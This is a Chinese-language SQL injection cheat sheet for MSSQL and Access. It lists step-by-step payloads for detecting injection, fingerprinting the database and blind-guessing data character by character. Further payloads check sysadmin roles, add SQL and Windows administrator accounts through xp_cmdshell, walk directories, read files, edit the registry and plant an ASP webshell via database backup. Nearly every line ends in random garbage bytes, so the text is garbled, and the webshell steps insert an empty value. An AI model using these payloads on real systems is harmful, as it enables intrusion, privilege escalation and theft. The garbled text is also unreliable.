1.判断是否有注入;and 1=1 ;and 1=2 fIF8%J� ^3
2.初步判断是否是mssql ;and user>0 �$C\BcKlmv
Q;u �pa��u
3.注入参数是字符'and [查询条件] and ''=' HV.t6@\};
O84i;S+-p
4.搜索时没过滤参数的'and [查询条件] and '%25'=' #�F#%�`Rv1
#S(Hd?3�4,
5.判断数据库系统 v�1[29t<I!
��=�f�b�Wz
;and (select count(*) from sysobjects)>0 mssql �:��r�[`.`
w��bH�b;]
;and (select count(*) from msysobjects)>0 access TNth������
+�0~YP*I`/
d�5.4l&\u
�pFXEu=�$3
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Pd�CEUh\>y
9my^�Y9B�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 q7!{?\�T�%
] @'!lh�Li
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ��xU��v�s:
�"#]���$r
9.(1)猜字段的ascii值(access) ��j�F>[?�L
�FtZ?C@1/
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 {FG��j]��*
Ngwb��Q7�)
(2)猜字段的ascii值(mssql) R@0��R`Zs
s�R�W<me�;
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �1,~D4lD�|
��y^��k$Us
10.测试权限结构(mssql) /,d��z@���
�8�QK&�_n*
�G�q6*SaTk
<�UI
[%yXj
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- <[�phnU^
8
s�S
Mh�`4'
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- JLY�i]n�Z
%RVZD#zr�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- y(&Ac[foS}
)�7d&��NE_
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �j [a(#�V{
4JE�pl'5^Q
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �TV:9bn?r)
Mhu*[a=;x�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �J05e#-)<K
!W\�+#e��z
;and 1=(select IS_MEMBER('db_owner'));-- 2T1q��?L?]
c�R{�#V1Z�
�d�v�e�iQ�
v^iAD2�X/F
11.添加mssql和系统的帐户 : +u]S2�u{
%��)|s1B'd
;exec master.dbo.sp_addlogin username;-- �@co
�S�+t
;exec master.dbo.sp_password null,username,password;-- ���omF�z�@
�@�7�u��0v
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- [m� -bV$-d
\G�BuW�Y3B
;exec master.dbo.xp_cmdshell 'net user username password @L`jk+Y0vF
>sF)�Bo�Lc
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ��S�@Y�3�9
7n�Sxi�+6e
;exec master.dbo.xp_cmdshell 'net user username password /add';-- fO�Hxt�HM�
5N]�"�~w*�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- p�dMc�}=K�
@�d_M@\r=j
KXr�jqqXs�
Z,=1buSz_
12.(1)遍历目录 Y@v�>FlqI{
YQ}�o?Q$�z
;create table dirs(paths varchar(100), id int) . me;.,$�#
.�X&9Q9T=#
;insert dirs exec master.dbo.xp_dirtree 'c:\' ^p�S~Z~[d/
jo7\`#(�Q
;and (select top 1 paths from dirs)>0 �t:S+%�u U
hb�-%_c"kq
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �TzZq�(?�V
b�$7 +�;I;
zqku e%^?-
'�R�)�Tn!6
(2)遍历目录 NHt\�
U9l'
rj�P/l6
~'
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 0�_/[k�*Re
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 y�}
'@R�$�
`��X��KLU�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 iCoX&�"l�b
"t�Ze�>>�I
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 K:M�8h{Ua�
8|^7�ai[am
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 W�xDh;*am:
�AX INTh�J
�]|@^1we��
l]��vm=�7:
13.mssql中的存储过程 �_�aphkeqd
xk5��]^yDp
xp_regenumvalues 注册表根键, 子键 _{>v�TBU4F
wL1MENzp*z
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �4�|� f*eO
Y2TtY�;��
xp_regread 根键,子键,键值名 ,6/V"�kqIP
B?QI�N]�
;exec xp_regread �s.rm7r@�#
�b�>W�%�t�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 s��"�|Pdc4
Iv *<L�a��
xp_regwrite 根键,子键, 值名, 值类型, 值 \['Cj�*e�k
nTas~~���Q
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 #��_�1`)VS
=I<R!��ZSN
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 a�X�VFc5C\
Qrv<lE1V�;
xp_regdeletevalue 根键,子键,值名 �t�1".���0
baasGa3}�s
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ks��tIgcI
G�yIV
H�by
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 #c�J�@uq�R
7$b1�<.WX�
�.`lCWeH�N
6863xOv{T�
14.mssql的backup创建webshell gi8F�HSU|G
�w�Y#�E�?,
use model �R-�:2HRaA
?�[�AD=rUC
create table cmd(str image); c$,P ~W�s'
Z;�i:��](�
insert into cmd(str) values (''); D��v"�9�qk
�;gkM{={`p
backup database model to disk='c:\l.asp'; Z�N�oDFf*h
'F<TSy|4kI
sB</�D��S�
0[`^\Mv4y�
15.mssql内置函数 Y73C5.dNcE
��:h$$J
lP
;and (select @@version)>0 获得Windows的版本号 ��0f/�<�7R
s1rCp�z�K0
;and user_name()='dbo' 判断当前系统的连接用户是不是sa pR�qx`5 �}
ixFi{_����
;and (select user_name())>0 爆当前系统的连接用户 .8R@2c`}Cs
m�*pJ�BZxd
;and (select db_name())>0 得到当前连接的数据库 NUZl`fu1Z4
6<���]l�W�
2i�OV/=�+
�M+>u/fldV
16.简洁的webshell 3�Ul*Q�N{6
����\�zkg�
use model @- xjfC�\d
��^�y::jK�
create table cmd(str image); XUY�t�Ef��
pk�zaNY/�q
insert into cmd(str) values (''); x4� yR8n(
WY/}�1X9.%
backup database model to disk='g:\wwwtest\l.asp';
